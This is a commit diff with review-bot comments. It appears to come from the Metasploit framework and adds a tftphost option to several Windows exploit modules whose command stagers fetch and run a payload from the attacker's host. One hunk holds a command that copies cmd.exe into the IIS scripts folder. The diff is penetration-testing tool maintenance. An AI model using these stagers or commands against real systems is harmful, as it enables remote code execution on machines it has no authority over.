exploits: Set tftphost option for modules which use Windows TFTP stager
parent
6b17905790
commit
bbbec267b6
|
@ -91,7 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
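Review bot: The `tftphost` ternary added before `execute_cmdstager` in `windows_stager` is copied verbatim into every module this commit touches (the other seven hunks on this page carry the identical line), so any later correction has to be made eight times. It would sit better as one helper beside the stager code, for example `def cmdstager_tftphost`, with each call site passing `tftphost: cmdstager_tftphost`. The comparison also recognises only the literal IPv4 wildcard `'0.0.0.0'`, so an unset `SRVHOST` (nil) or the IPv6 wildcard `'::'` would be handed to the stager unchanged; a wider guard such as `['0.0.0.0', '::', nil].include?(datastore['SRVHOST'])` would cover those, though whether these modules register `SRVHOST` is not visible here. `windows_stager` continues past the end of the hunk.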
@ -106,7 +106,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
exe_fname = rand_text_alphanumeric(4 + rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
@ -50,16 +50,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def windows_stager
|
||||
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.', :cgifname => exe_fname })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
|
|
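Review bot: The rewritten `execute_cmdstager` call in this `windows_stager` no longer passes `cgifname`, which the replaced call set to `exe_fname`; the commit title only mentions adding `tftphost`, so this reads as an unrelated behaviour change. If dropping it is intended, the commit message should say so and the `exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"` assignment should not be left behind as an unused local; otherwise keep the option, `execute_cmdstager({ temp: '.', tftphost: tftphost, cgifname: exe_fname })`. The rendered page does not show which of the surrounding lines were removed, so this needs checking against the file itself.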
@ -53,7 +53,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
|
|
|
@ -54,12 +54,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def windows_stager
|
||||
print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
|
||||
execute_cmdstager({ :temp => '.' })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost })
|
||||
@payload_exe = generate_payload_exe
|
||||
|
||||
print_status("Attempting to execute the payload...")
|
||||
execute_command(@payload_exe)
|
||||
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
|
|
|
@ -344,7 +344,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
|
||||
|
||||
# Use the CMD stager to get a payload running
|
||||
execute_cmdstager({ :temp => '.', :linemax => 1400, :cgifname => exe_fname })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
|
||||
|
||||
# Save these file names for later deletion
|
||||
@exe_cmd_copy = exe_fname
|
||||
|
|
|
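Review bot: `noconcat: true` is new in this `execute_cmdstager` call and is not covered by the commit title, and nothing next to it says why this module needs the option when the other modules in the commit do not. A one-line comment above the call, e.g. `# noconcat: <reason this target needs it>`, would keep a later cleanup from removing it by accident. The enclosing method starts and ends outside the hunk.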
@ -173,7 +173,8 @@ Processor-Speed=#{processor_speed}
|
|||
# CmdStagerVBS was tested here as well, however delivery took roughly
|
||||
# 30 minutes and required sending almost 350 notification messages.
|
||||
# size constraint requirement for SQLi is: linemax => 393
|
||||
execute_cmdstager({ :delay => 1.5, :temp => '%TEMP%\\', :flavor => :tftp })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
|
|
|
@ -99,8 +99,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
method = datastore['METHOD'].downcase
|
||||
|
||||
if (method =~ /^cmd/)
|
||||
execute_cmdstager({ :linemax => 1500, :nodelete => true })
|
||||
#execute_cmdstager({ :linemax => 1500 })
|
||||
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
|
||||
execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
|
||||
else
|
||||
# Generate the EXE, this is the same no matter what delivery mechanism we use
|
||||
exe = generate_payload_exe
|
||||
|
|